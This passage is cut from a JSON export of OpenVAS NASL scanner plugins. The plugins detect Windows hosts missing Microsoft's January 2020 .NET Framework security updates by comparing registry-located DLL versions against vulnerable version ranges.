\"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532931\n ## https://support.microsoft.com/en-us/help/4532940\n if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "This host is missing a critical security\n update according to Microsoft KB4532938", "modified": "2020-06-04T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310815894", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815894", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532938)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815894\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532938)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4532938\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5 and 4.8 on Microsoft Windows 10 version 1903 and Microsoft Windows 10 version 1909.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4532938\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.18362\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532938\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.9142\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.9142\" ;\n break;\n }\n ## https://support.microsoft.com/en-us/help/4532938\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532938\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.9142\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.9142\" ;\n break;\n }\n ## https://support.microsoft.com/en-us/help/4532938\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532938\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\")){\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "This host is missing a critical security\n update according to Microsoft KB4532935", "modified": "2020-06-04T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310815895", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815895", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532935)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815895\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532935)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4532935\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.8 on Microsoft Windows 10 version 1709.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4532935\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.16299\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532935\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532935\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532935\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\")){\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "This host is missing a critical security\n update according to Microsoft KB4535102", "modified": "2020-06-04T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310816552", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816552", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535102)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816552\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535102)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4535102\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5.1, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Microsoft Windows 7 SP1 and Microsoft Windows Server 2008 R2 SP1.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4535102/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n}\n\nkey_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\nforeach key(key_list)\n{\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532945\n ## https://support.microsoft.com/en-us/help/4532929\n ## https://support.microsoft.com/en-us/help/4532932\n ## https://support.microsoft.com/en-us/help/4532941\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.8832\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.8832\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36576\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36576\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532945\n ## https://support.microsoft.com/en-us/help/4532929\n ## https://support.microsoft.com/en-us/help/4532932\n ## https://support.microsoft.com/en-us/help/4532941\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.8832\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.8832\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36576\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36576\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532932\n ## https://support.microsoft.com/en-us/help/4532941\n if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.6 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "This host is missing a critical security\n update according to Microsoft KB4532936", "modified": "2020-06-04T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310815897", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815897", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532936", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815897\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4532936\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4532936\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 4.8 on Microsoft Windows 10 Version 1803.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4532936\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.17134\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532936\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532936\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4532936\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\")){\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "description": "This host is missing a critical security\n update according to Microsoft KB4534306", "modified": "2020-07-17T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310815745", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815745", "type": "openvas", "title": "Microsoft Windows Multiple 